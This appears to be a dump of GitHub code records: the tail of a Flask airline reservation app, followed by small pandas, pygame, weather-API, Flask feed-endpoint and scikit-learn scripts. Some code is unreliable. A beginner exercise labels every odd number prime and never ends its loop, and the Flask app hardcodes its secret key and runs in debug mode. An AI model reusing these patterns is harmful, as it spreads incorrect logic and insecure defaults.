title=\"Airline Staff Add Airplane\",\\\n message=f\"{airport_type} Airport {name} in {city}, {country} Added\",\\\n next=\"/staff\")\n\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_view_flight_ratings', methods=['GET', 'POST'])\ndef staff_view_flight_ratings():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n flight_num = \"\"\n dept_time = \"\"\n airline = session['employer']\n\n try:\n flight_num = request.form['flight_num']\n dept_time = request.form['dept_time']\n except:\n #Allow empty fields through\n pass\n\n if not parse_input([flight_num, dept_time]):\n return redirect(url_for('/staff'))\n\n headings, ratings = staff_view_avg_rating(flight_num, airline, dept_time, mysql)\n\n return render_template(\"staff_view_flight_ratings.html\", headings=headings, ratings=ratings, airline=airline)\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_view_ratings_and_comments//')\ndef staff_view_ratings_and_comments_view(flight_num, dept_time):\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n airline = session['employer']\n\n headings, reviews = staff_view_ratings_and_comments(flight_num, airline, dept_time, mysql)\n return render_template('staff_view_ratings_and_comments.html', headings=headings, reviews=reviews, flight_num=flight_num)\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_view_frequent_customer', methods=['GET', 'POST'])\ndef staff_view_frequent_customer():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n _, mfc = staff_view_mfc_pastyear(mysql)\n mfc = mfc[0]\n airline = session['employer']\n\n email = \"\"\n\n try:\n email = request.form['email']\n except:\n return render_template('staff_view_frequent_customer.html', mfc=mfc, airline=airline)\n\n headings, customer_info = staff_view_customer_flight_history(email, airline, mysql)\n\n\n return render_template(\"staff_view_frequent_customer.html\", mfc=mfc, headings=headings, customer_info=customer_info, airline=airline)\n\n return redirect(url_for(\"login_staff\"))\n\n\n@app.route('/staff_view_report_form')\ndef staff_view_tickets_sold():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n return render_template('staff_view_report_form.html')\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_view_report_view', methods=['GET', 'POST'])\ndef staff_view_tickets_sold_view():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n s_date = \"\"\n e_date = \"\"\n airline = session['employer']\n\n try:\n s_date = request.form['s_date']\n e_date = request.form['e_date']\n except:\n return redirect(url_for('staff_view_tickets_sold'))\n\n if not parse_input([s_date, e_date]):\n return redirect(url_for('staff_view_tickets_sold'))\n\n _, t_sold = staff_view_tickets_sold_range(s_date, e_date, airline, mysql)\n t_sold = t_sold[0][0]\n\n return render_template('staff_view_report.html', t_sold=t_sold, s_date=s_date.split(\" \")[0],\n e_date=e_date.split(\" \")[0])\n\n return redirect(url_for(\"login_staff\"))\n\n\n@app.route('/staff_view_bar_chart', methods=['GET'])\ndef staff_view_monthly_sales():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n airline = session['employer']\n\n monthly_sales, start_month = staff_view_tickets_sold_monthly(airline, mysql)\n year = ['January', 'February', 'March', 'April', 'May', 'June', 'July',\n 'August', 'September', 'October', 'November', 'December']\n labels = year[(start_month - 1):]\n labels.extend(year[:(start_month - 1)])\n\n return render_template('staff_chart.html', data=monthly_sales, months=labels)\n\n return redirect(url_for(\"login_staff\"))\n\n\n@app.route('/staff_view_revenue')\ndef staff_view_revenue():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n\n airline = session['employer']\n _, m_revenue = staff_view_revenue_pastmonth(airline, mysql)\n _, y_revenue = staff_view_revenue_pastyear(airline, mysql)\n m_revenue = round(m_revenue[0][0], 2)\n y_revenue = round(y_revenue[0][0], 2)\n\n return render_template('staff_view_revenue.html', m_revenue=m_revenue, y_revenue=y_revenue)\n\n return redirect(url_for(\"login_staff\"))\n\n\n### CUSTOMER USE CASES ###\n@app.route('/customer_view_flight', methods=[\"POST\", \"GET\"])\ndef customer_view_flight():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n s_date = None\n e_date = None\n a_org = None\n a_dest = None\n c_org = None\n c_dest = None\n flights = []\n\n try:\n s_date = request.form['after']\n e_date = request.form['before']\n a_org = request.form['source']\n a_dest = request.form['destination']\n c_org = request.form['s_city']\n c_dest = request.form['d_city']\n except:\n pass\n\n if not parse_input([s_date,e_date,a_org,a_dest,c_org,c_dest]):\n return render_template('customer_view_flights.html')\n\n if not check_datetime_format(s_date) and check_datetime_format(e_date):\n error = 'Datetime must be formate YYYY-MM-DD HH:MM:SS'\n return render_template('customer_view_flights.html', error=error)\n\n email = session['username']\n headings, data = customer_view_my_flights(email, mysql, START_DATE=s_date, END_DATE=e_date,\n AP_ORIGIN=a_org, AP_DEST=a_dest, CITY_ORIGIN=c_org, CITY_DEST=c_dest)\n return render_template('customer_view_flights.html', headings=headings, data=data)\n else:\n return redirect('/')\n\n@app.route('/customer_search_flight')\ndef customer_search_flight():\n return redirect(url_for(\"public_info\"))\n\n@app.route('/customer_init_purchase', methods=[\"POST\", \"GET\"])\ndef customer_init_purchase():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n\n headings, data = public_view_oneway_flights(mysql)\n return render_template('customer_purchase_flight.html', headings=headings, data=data)\n\n return redirect(url_for('login_customer'))\n\n\n# DOES NOT HANDLE two-way flights\n@app.route('/customer_purchase_search_flights', methods=[\"POST\", \"GET\"])\ndef customer_purchase_search_flights():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n c_org = None\n c_dest = None\n a_org = None\n a_dest = None\n dept_dt = None\n return_dt = None\n headings = []\n data = []\n\n try:\n c_org = request.form['city_origin']\n c_dest = request.form['city_dest']\n a_org = request.form['airport_origin']\n a_dest = request.form['airport_dest']\n dept_dt = request.form['dept_dt']\n return_dt = request.form['return_dt']\n except:\n pass\n\n if not parse_input([c_org, c_dest, a_org, a_dest, dept_dt, return_dt]):\n return render_template('customer_purchase_flight.html', headings=headings, data=data)\n\n if not check_datetime_format(dept_dt) and check_datetime_format(return_dt):\n error = 'Datetime must be formate YYYY-MM-DD HH:MM:SS'\n return render_template('customer_purchase_flight.html', headings=headings, data=data, error=error)\n\n headings, data = public_view_oneway_flights(mysql, CITY_ORIGIN=c_org, CITY_DEST=c_dest, AP_ORIGIN=a_org,\n AP_DEST=a_dest, START_DATE=dept_dt, END_DATE=return_dt)\n return render_template('customer_purchase_flight.html', headings=headings, data=data)\n\n return redirect(url_for(\"login_customer\"))\n\n@app.route('/customer_stage_purchase////',\n methods=[\"POST\", \"GET\"])\ndef customer_stage_purchase(flight_number, airline, dept_dt, base_price):\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n #clean_dt = dept_dt[0:4] + dept_dt[5:7] + dept_dt[8:10]\n\n sp=get_sold_price(flight_number,airline,dept_dt,base_price,mysql)\n if sp==None:\n error='Failed to purchase ticket. Flight capacity full.'\n return render_template('customer_stage_purchase.html', error=error)\n heading=('Final Price')\n data=(str(sp))\n flight_data = [flight_number,airline,dept_dt,base_price,sp]\n return render_template('customer_stage_purchase.html', flight_data=flight_data, header=heading, data=data)\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/customer_confirm_purchase////',\n methods=[\"POST\", \"GET\"])\ndef customer_confirm_purchase(flight_number, airline, dept_dt, base_price):\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n\n cc_num = None\n cc_expr = None\n cc_name = None\n cc_type = None\n sold_price = None\n flight_data=[]\n try:\n cc_num = request.form['cc_num']\n cc_expr = request.form['cc_expr']\n cc_name = request.form['cc_name']\n cc_type = request.form['cc_type']\n except:\n error = 'Bad Inputs'\n return render_template('customer_stage_purchase.html', error=error)\n\n if not parse_input( [cc_num,cc_expr,cc_name,cc_type] ):\n error = 'Bad inputs'\n return render_template('customer_stage_purchase.html', error=error)\n\n if cc_type not in ['credit', 'debit']:\n error = \"Bad inputs. Card type must be 'credit' or 'debit'\"\n render_template('customer_stage_purchase.html', error=error)\n\n email = session['username']\n\n sold_price = get_sold_price(flight_number, airline, dept_dt, base_price, mysql)\n customer_purchase_ticket(flight_number, airline, dept_dt, sold_price, base_price, cc_num, cc_expr, cc_name,\n cc_type, email, mysql)\n flight_data = [flight_number, airline, dept_dt, base_price, sold_price]\n return render_template('customer_stage_purchase.html', confirmation=' Purchase Created', flight_data=flight_data)\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/customer_init_delete', methods=[\"POST\", \"GET\"])\ndef customer_init_delete():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n\n email = session['username']\n headings, data = customer_view_my_flights(email, mysql)\n return render_template('customer_delete_flight.html', headings=headings, data=data)\n\n return redirect(url_for('login_customer'))\n\n@app.route('/customer_delete_search_flights', methods=[\"POST\", \"GET\"])\ndef customer_delete_search_flights():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n c_org = None\n c_dest = None\n a_org = None\n a_dest = None\n dept_dt = None\n return_dt = None\n headings = []\n data = []\n\n try:\n c_org = request.form['city_origin']\n c_dest = request.form['city_dest']\n a_org = request.form['airport_origin']\n a_dest = request.form['airport_dest']\n dept_dt = request.form['dept_dt']\n return_dt = request.form['return_dt']\n except:\n pass\n\n if not parse_input([c_org, c_dest, a_org, a_dest, dept_dt, return_dt]):\n return render_template('customer_purchase_flight.html', headings=headings, data=data)\n\n if not check_datetime_format(dept_dt) and check_datetime_format(return_dt):\n error = 'Datetime must be formate YYYY-MM-DD HH:MM:SS'\n return render_template('customer_purchase_flight.html', headings=headings, data=data, error=error)\n\n email = session['username']\n headings, data = customer_view_my_flights(email, mysql, START_DATE=dept_dt, END_DATE=return_dt,\n AP_ORIGIN=a_org, AP_DEST=a_dest, CITY_ORIGIN=c_org, CITY_DEST=c_dest)\n return render_template('customer_delete_flight.html', headings=headings, data=data)\n\n return redirect(url_for(\"login_customer\"))\n\n@app.route('/customer_confirm_delete/', methods=[\"POST\", \"GET\"])\ndef customer_confirm_delete(ticket_id):\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n\n email = session['username']\n customer_cancel_ticket(email, ticket_id, mysql)\n return redirect(url_for(\"customer_init_delete\"))\n\n return redirect(url_for(\"login_customer\"))\n\n\n@app.route('/customer_spending', methods=[\"POST\", \"GET\"])\ndef customer_spending():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n email = session['username']\n headings, data = customer_view_spending_pastyear(email, mysql)\n return render_template('customer_spending.html', headings=headings, data=data)\n\n return redirect(url_for('login_customer'))\n\n@app.route('/customer_spending_search', methods=[\"POST\", \"GET\"])\ndef customer_spending_search():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n s_date = datetime_in_X_days(-365)\n e_date = datetime_in_X_days(0)\n\n try:\n s_date = request.form['before']\n e_date = request.form['after']\n except:\n pass\n\n if not parse_input( [s_date, e_date] ):\n error = 'Bad Inputs'\n return render_template('customer_spending.html', error=error)\n\n if not (check_datetime_format(s_date) and check_datetime_format(e_date)):\n error = 'Datetime must be format YYYY-MM-DD HH:MM:SS'\n return render_template('customer_spending.html', error=error)\n\n email = session['username']\n headings, data = customer_view_spending_interval(email, s_date, e_date, mysql)\n\n # only shows bar chart if 2 dates entered\n if s_date != \"\" and e_date != \"\" and s_date is not None and e_date is not None:\n s_date = datetime.datetime.strptime(s_date[:20], '%Y-%m-%d %H:%M:%S')\n e_date = datetime.datetime.strptime(e_date[:20], '%Y-%m-%d %H:%M:%S')\n b_labels = spending_barchart_labels(s_date.month, e_date.month)\n monthly_s = customer_spending_monthly(email, s_date, e_date, mysql)\n\n return render_template('customer_spending.html', headings=headings, data=data,\n months=b_labels, b_data=monthly_s)\n\n return render_template('customer_spending.html', headings=headings, data=data)\n #data = round(data, 2)\n\n return redirect(url_for('login_customer'))\n\n\n@app.route('/customer_spending_6months', methods=[\"POST\", \"GET\"])\ndef customer_spending_6months():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n\n email = session['username']\n headings, data = customer_view_spending_past6months(email, mysql)\n #data = round(data, 2)\n\n today = datetime.datetime.today() # bar chart data\n e_date = today\n s_date = today.replace(year=(today.year - 1), day=1)\n for i in range(6):\n s_date = increment_dt_month(s_date)\n b_labels = spending_barchart_labels(s_date.month, e_date.month)\n monthly_s = customer_spending_monthly(email, s_date, e_date, mysql)\n\n return render_template('customer_spending.html', headings=headings, data=data,\n months=b_labels, b_data=monthly_s)\n\n return redirect(url_for('login_customer'))\n\n@app.route('/customer_spending_year', methods=[\"POST\", \"GET\"])\ndef customer_spending_year():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n email = session['username']\n headings, data = customer_view_spending_pastyear(email, mysql)\n #data = round(data, 2)\n\n today = datetime.datetime.today() # bar chart\n e_date = today\n s_date = today.replace(year=(today.year - 1), day=1)\n b_labels = spending_barchart_labels(s_date.month, e_date.month)\n monthly_s = customer_spending_monthly(email, s_date, e_date, mysql)\n\n return render_template('customer_spending.html', headings=headings, data=data,\n months=b_labels, b_data=monthly_s)\n\n return redirect(url_for('login_customer'))\n\n\n@app.route('/customer_rate_and_comment', methods=[\"POST\", \"GET\"])\ndef customer_rate_and_comment():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n\n email = session['username']\n r_headings, r_data = customer_view_review(email, mysql)\n\n today = datetime_in_X_days(0)\n f_headings, f_data = customer_view_my_flights(email, mysql, END_DATE=today)\n\n return render_template('customer_rate_and_comment.html',\n r_headings=r_headings, r_data=r_data,\n f_headings=f_headings, f_data=f_data)\n\n return redirect(url_for('login_customer'))\n\n@app.route('/customer_stage_rate_and_comment/', methods=[\"POST\", \"GET\"])\ndef customer_stage_rate_and_comment(ticket_id):\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n return render_template('customer_stage_rate_and_comment.html', ticket_id=ticket_id)\n return redirect(url_for(\"login_customer\"))\n\n\n@app.route('/customer_create_rate_and_comment/', methods=[\"POST\", \"GET\"])\ndef customer_create_rate_and_comment(ticket_id):\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n rating = None\n comment = None\n\n try:\n rating = request.form['rating']\n comment = request.form['comment']\n except:\n error = 'Bad Inputs'\n return render_template('customer_stage_rate_and_comment.html', error=error)\n\n if rating not in ['1','2','3','4','5']:\n error = 'Rating must be 1-5'\n return render_template('customer_stage_rate_and_comment.html', error=error)\n\n if len(comment) > 400:\n error = 'Comment cannot be more than 400 char'\n return render_template('customer_stage_rate_and_comment.html', error=error)\n\n email = session['username']\n try:\n customer_create_review(email, ticket_id, rating, comment, mysql)\n except:\n pass\n\n return redirect(url_for('customer_rate_and_comment'))\n\n return redirect(url_for('login_customer'))\n\n\n\napp.secret_key = 'some key that you will never guess'\n# Run the app on localhost port 5000\n# debug = True -> you don't have to restart flask\n# for changes to go through, TURN OFF FOR PRODUCTION\nif __name__ == \"__main__\":\n app.run('127.0.0.1', 5000, debug=True)\n\n\n","repo_name":"Junming-Qiu/AirlineReservation","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":39212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12372632791","text":"# proprietary to BEERA // DO NOT COPY\n\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt \nfrom time import sleep\nimport seaborn as sns\nimport numpy as np \n\n\n\n\ndf = pd.read_csv('100_Sales_Records.csv', parse_dates=[5, 7])\ndf = df[df['Sales Channel'] == 'Online']\n\ndf = df[['Order Priority', 'Order Date', 'Ship Date']]\n\ndf['diff'] = df['Ship Date'] - df['Order Date']\n\n\ndef defff(row):\n\ta = int(row['diff'].days)\n\tif row['Ship Date'].year >= 2013: a -= 3\n\tif row['Ship Date'].year == 2014: a -= 6\n\tif row['Ship Date'].year >= 2014: a -= 6\n\tif row['Ship Date'].year >= 2015: a -= 2\n\tif row['Ship Date'].year >= 2016: a -= 3\n\treturn a\n\n\ndf = df.sort_values('Ship Date',ascending=True)\n# df['diff'] = str(df['diff'])\n# print(df)\ndf['deff'] = 0\n\n# for index, row in df.iterrows():\n# \trow['deff'] = int(row['diff'].days)\n# \tprint(int(row['diff'].days))\n# print(df)\n\ndf['deff'] = df.apply(defff, axis = 1)\n# print(df)\n\ndf.to_csv('priorty.csv')\nexit()\nprint(df)\n\n# df = df.sort_values('diff',ascending=True)\nplt.figure()\n\nplt.plot(df['Ship Date'], df['deff'])\n\nplt.show()\n","repo_name":"sreeram315/Trash---To-keep-this-space-clean","sub_path":"data_science_class/deving/prior.py","file_name":"prior.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"299901940","text":"import pygame\nimport game_constants as gc\nimport illustrator\nfrom graph import Graph\nfrom problem import Problem\n\nquit_game = lambda event: event.type == pygame.QUIT\nleft_mouse_pressed = lambda: pygame.mouse.get_pressed()[0]\nright_mouse_pressed = lambda: pygame.mouse.get_pressed()[2]\n\ndef main(search_agent_init):\n graph = Graph()\n start_state = None\n goal_state = None\n run = True\n\n while run:\n illustrator.draw(gc.WIN, graph)\n\n for event in pygame.event.get():\n if quit_game(event):\n run = False\n\n if left_mouse_pressed():\n pos = pygame.mouse.get_pos()\n row, col = graph.get_clicked_pos(pos)\n node = graph.matrix[row][col]\n\n if not start_state and node != goal_state:\n start_state = node\n start_state.make_start()\n\n elif not goal_state and node != start_state:\n goal_state = node\n goal_state.make_goal()\n\n elif node != goal_state and node != start_state:\n node.make_barrier()\n\n illustrator.draw(gc.WIN, graph)\n elif right_mouse_pressed():\n pos = pygame.mouse.get_pos()\n row, col = graph.get_clicked_pos(pos)\n node = graph.matrix[row][col]\n node.reset()\n\n if node == start_state:\n start_state = None\n elif node == goal_state:\n goal_state = None\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE and start_state and goal_state:\n for row in graph.matrix:\n for node in row:\n node.update_neighbors(graph.matrix)\n\n problem = Problem(graph.matrix, start_state, goal_state)\n search_agent = search_agent_init(graph, problem)\n search_agent.algorithm()\n search_agent.walk_path()\n\n if event.key == pygame.K_c:\n start_state = None\n goal_state = None\n graph = Graph()\n\n keys = pygame.key.get_pressed() #checking pressed keys\n if keys[pygame.K_LSHIFT]:\n pos = pygame.mouse.get_pos()\n row, col = graph.get_clicked_pos(pos)\n node = graph.matrix[row][col]\n node.make_medium_cost()\n\n if keys[pygame.K_LALT]:\n pos = pygame.mouse.get_pos()\n row, col = graph.get_clicked_pos(pos)\n node = graph.matrix[row][col]\n node.make_high_cost()\n\n pygame.quit()\n","repo_name":"aRod209/path-finders","sub_path":"path_finder.py","file_name":"path_finder.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22315937845","text":"import sys\n\nx1, y1, x2, y2 = map(int, sys.stdin.readline().split())\n\nif abs(x1-x2) == 0:\n d = abs(y1-y2)\n print(x1+d, y1, x1+d, y2, sep=' ')\nelif abs(y1-y2) == 0:\n d = abs(x1-x2)\n print(x1, y1+d, x2, y2+d, sep=' ')\nelif abs(x1-x2) == abs(y1-y2):\n print(x1, y2, x2, y1, sep=' ')\nelse:\n print(\"-1\")\n","repo_name":"guzhoudiaoke/practice","sub_path":"codeforces/459A/py/459a.py","file_name":"459a.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2193446651","text":"# Prime numbers woh numbers hote hai jo sirf 1 aur apne aap se divisible hote hain. \n# Jaise 13 prime hai kyunki 13 sirf 13 aur 1 se perfectly divide hota hai. \n# Aur kisi bhi number se perfectly divide nahi hota.\n# 4 prime nahi hai kyunki 4 apne aap se aur 2 aur 1 se perfectly divide hota hai.\n# Prime number ke liye aapko check karna hoga ki woh number kaun kaun se numbers se divisible hai. \n# Yeh loop chala ke kar sakte ho.\n#(FOR LOOP QUESTION)\ncounter=1\nwhile counter<=100:\n user_input=int(input(\"enter a value\"))\n if user_input%2!=0:\n print(\"It's a prime number\")\n else:\n print(\"It's a composite number\")\ncounter+=1\n ","repo_name":"BhagyashreeKarale/loop","sub_path":"18set2ques7.py","file_name":"18set2ques7.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4230691243","text":"try:\n from secrets import weather_api_key\nexcept ImportError:\n print(\"WEATHER API ERROR. NO SECRETS FILE DETECTED. CREATE secrets.py THEN ADD weather_api_key STRING\")\nexcept FileNotFoundError:\n print(\"WEATHER API ERROR. NO SECRETS FILE DETECTED. CREATE secrets.py THEN ADD weather_api_key STRING\")\n\nimport requests\nimport json\n\n\nclass Weather:\n \"\"\"This class represents the weather which is fetched from the openweathermap API\"\"\"\n\n def __init__(self, city_name):\n \"\"\"Initialises the object and sets the object city_name.\n\n Keyword arguments:\n city_name -- the current city the device is in i.e. Cardiff, London etc\n \"\"\"\n self.city_name = city_name\n self.read_weather()\n\n def create_celcius_temp(self):\n \"\"\"Converts object's kelvin value to celcius\"\"\"\n raw_celcius = (self.kelvin_temp - 273.15)\n formatted_celcius = round(raw_celcius, 2)\n self.set_ceclius_temp(formatted_celcius)\n\n def read_weather(self):\n \"\"\"Requests data from the open weather api. Requires secret to be defined in a secrets.py file\"\"\"\n\n base_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n\n complete_url = base_url + \"appid=\" + weather_api_key + \"&q=\" + self.city_name\n\n response = requests.get(complete_url)\n\n pretty_json = response.json()\n self.pretty_json = pretty_json\n\n try:\n\n main_data = pretty_json[\"main\"]\n\n current_temperature_kelvin = main_data[\"temp\"]\n\n self.set_kelvin_temp(current_temperature_kelvin)\n self.create_celcius_temp()\n self.set_weather_description(\n pretty_json[\"weather\"][0]['description'])\n\n except KeyError:\n\n error_code = str(pretty_json[\"cod\"])\n\n if error_code == '404':\n\n print(\" --- City Not Found --- \")\n\n if error_code == '401':\n\n print(\" --- API KEY ERROR --- \")\n\n else:\n print(\"UNKNOWN ERROR CODE\")\n\n def get_ceclius_temp(self):\n \"\"\"Gets the temp of weather in celcius\"\"\"\n return self.celcius_temp\n\n def get_kelvin_temp(self):\n \"\"\"Gets the temp of weather in kelvin\"\"\"\n return self.kelvin_temp\n\n def get_weather_description(self):\n \"\"\"Gets description of the weather\"\"\"\n return self.weather_description\n\n def set_ceclius_temp(self, c):\n \"\"\"Sets the temp of weather in celcius\"\"\"\n self.celcius_temp = c\n\n def set_kelvin_temp(self, k):\n \"\"\"Sets the temp of weather in kelvin\"\"\"\n self.kelvin_temp = k\n\n def set_weather_description(self, description):\n \"\"\"Sets description of the weather\"\"\"\n self.weather_description = description\n","repo_name":"gowhale/room-temperature-visualization","sub_path":"weather_api.py","file_name":"weather_api.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12037689942","text":"\"\"\"\nFeeds\n\nEndpoints for getting information on feeds and for triggering feed updates.\n\"\"\"\n\nimport flask\nfrom flask import Blueprint\n\nfrom transiter.http.httpmanager import (\n http_endpoint,\n link_target,\n HttpMethod,\n HttpStatus,\n is_sync_request,\n)\nfrom transiter import exceptions\nfrom transiter.http.permissions import requires_permissions, PermissionsLevel\nfrom transiter.services import feedservice, views\n\nfeed_endpoints = Blueprint(__name__, __name__)\n\n\n@http_endpoint(feed_endpoints, \"\")\n@link_target(views.FeedsInSystem, [\"_system_id\"])\n@requires_permissions(PermissionsLevel.ADMIN_READ)\ndef list_all_in_system(system_id):\n \"\"\"\n List feeds in a system\n\n List all the feeds in a transit system.\n\n Return code | Description\n ----------------|-------------\n `200 OK` | Returned if the system with this ID exists.\n `404 NOT FOUND` | Returned if no system with the provided ID is installed.\n \"\"\"\n return feedservice.list_all_in_system(system_id)\n\n\n@http_endpoint(feed_endpoints, \"/\")\n@link_target(views.Feed, [\"_system_id\", \"id\"])\n@requires_permissions(PermissionsLevel.ADMIN_READ)\ndef get_in_system_by_id(system_id, feed_id):\n \"\"\"\n Get a feed in a system\n\n Describe a feed in a transit system.\n\n Return code | Description\n --------------------|-------------\n `200 OK` | Returned if the system and feed exist.\n `404 NOT FOUND` | Returned if either the system or the feed does not exist.\n \"\"\"\n return feedservice.get_in_system_by_id(system_id, feed_id)\n\n\n@http_endpoint(feed_endpoints, \"/\", method=HttpMethod.POST)\n@requires_permissions(PermissionsLevel.ALL)\ndef create_feed_update(system_id, feed_id):\n \"\"\"\n Perform a feed update\n\n Perform a feed update of the given feed.\n The response is a description of the feed update.\n\n This endpoint is provided for one-off feed updates and development work.\n In general feed updates should instead be scheduled periodically using the transit system configuration;\n see the [transit system documentation](systems.md) for more information.\n\n Return code | Description\n --------------------|-------------\n `201 CREATED` | Returned if the system and feed exist, in which case the update is _scheduled_ (and executed in the same thread, if sync).\n `404 NOT FOUND` | Returned if either the system or the feed does not exist.\n \"\"\"\n user_provided_content = flask.request.files.get(\"content\")\n if user_provided_content is not None:\n user_provided_content = user_provided_content.read()\n if len(user_provided_content) == 0:\n raise exceptions.InvalidInput(\"No file or an empty file provided.\")\n if not is_sync_request():\n raise exceptions.InvalidInput(\n \"Feed updates with content provided must be run synchronously. \"\n \"Use the sync=true url parameter.\"\n )\n feed_update_pk = feedservice.create_and_execute_feed_update(\n system_id,\n feed_id,\n execute_async=not is_sync_request(),\n content=user_provided_content,\n )\n return (\n feedservice.get_update_in_feed_by_pk(system_id, feed_id, feed_update_pk),\n HttpStatus.CREATED,\n )\n\n\n@http_endpoint(feed_endpoints, \"//flush\", method=HttpMethod.POST)\n@requires_permissions(PermissionsLevel.ALL)\ndef create_feed_update_flush(system_id, feed_id):\n \"\"\"\n Perform a feed flush\n\n The feed flush operation removes all entities from Transiter\n that were added through updates for the given feed.\n The operation is useful for removing stale data from the database.\n\n Return code | Description\n --------------------|-------------\n `201 CREATED` | Returned if the system and feed exist, in which case the flush is _scheduled_ (and executed in the same thread, if sync).\n `404 NOT FOUND` | Returned if either the system or the feed does not exist.\n \"\"\"\n feed_update_pk = feedservice.create_and_execute_feed_flush(\n system_id, feed_id, execute_async=not is_sync_request()\n )\n return (\n feedservice.get_update_in_feed_by_pk(system_id, feed_id, feed_update_pk),\n HttpStatus.CREATED,\n )\n\n\n@http_endpoint(feed_endpoints, \"//updates\")\n@link_target(views.UpdatesInFeedLink, [\"_system_id\", \"_feed_id\"])\n@requires_permissions(PermissionsLevel.ADMIN_READ)\ndef list_updates_in_feed(system_id, feed_id):\n \"\"\"\n List updates for a feed\n\n List the most recent updates for a feed.\n Up to one hundred updates will be listed.\n\n Return code | Description\n --------------------|-------------\n `200 OK` | Returned if the system and feed exist.\n `404 NOT FOUND` | Returned if either the system or the feed does not exist.\n \"\"\"\n return feedservice.list_updates_in_feed(system_id, feed_id)\n","repo_name":"jamespfennell/transiter-python","sub_path":"transiter/http/endpoints/feedendpoints.py","file_name":"feedendpoints.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15034288255","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 28 23:58:17 2016\n\n@author: phucn_000\n\"\"\"\n\n\"\"\"\nSpyder Editor\n\nThis is my submission to Machine Learning Course on Coursera. \nThis containts heavily sample code provided in the course. \nI changed the dataset, number of tree 30\nI also have to use write_pdf instead of create_png to create output\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pylab as plt\nfrom sklearn.cross_validation import train_test_split\nimport sklearn.metrics\n # Feature Importance\nfrom sklearn.ensemble import ExtraTreesClassifier\n\nos.chdir(\"C:\\Machine_learning\")\n\n#Load the dataset\n\nAH_data = pd.read_csv(\"addhealth_pds.csv\")\ndata_clean = AH_data.dropna()\n\ndata_clean.dtypes\ndata_clean.describe()\n\n#Split into training and testing sets\n\npredictors = data_clean[['BIO_SEX','H1GI4','H1GI5A','H1GI5B']]\npredictors.dtypes\ntargets = data_clean.SCH_YR\n\npred_train, pred_test, tar_train, tar_test = train_test_split(predictors, targets, test_size=.3)\n\npred_train.shape\npred_test.shape\ntar_train.shape\ntar_test.shape\n\n#Build model on training data\nfrom sklearn.ensemble import RandomForestClassifier\n\nclassifier=RandomForestClassifier(n_estimators=30)\nclassifier=classifier.fit(pred_train,tar_train)\n\npredictions=classifier.predict(pred_test)\n\nsklearn.metrics.confusion_matrix(tar_test,predictions)\nsklearn.metrics.accuracy_score(tar_test, predictions)\n\n\n# fit an Extra Trees model to the data\nmodel = ExtraTreesClassifier()\nmodel.fit(pred_train,tar_train)\n\n\n\nprint(model.feature_importances_)\n\"\"\" [ 0.47544108 0.16881172 0.16961701 0.18613019]\ndisplay the relative importance of each attribute, correspondingly BIO_SEX, H1GI4, H1GI5, H1GI5B\n\"\"\"\n\n\"\"\"\nRunning a different number of trees and see the effect\n of that on the accuracy of the prediction\n\"\"\"\n\ntrees=range(30)\naccuracy=np.zeros(30)\n\nfor idx in range(len(trees)):\n classifier=RandomForestClassifier(n_estimators=idx + 1)\n classifier=classifier.fit(pred_train,tar_train)\n predictions=classifier.predict(pred_test)\n accuracy[idx]=sklearn.metrics.accuracy_score(tar_test, predictions)\n \nplt.cla()\ngraph = plt.plot(trees, accuracy)\n\n\"\"\"\nThis plot show 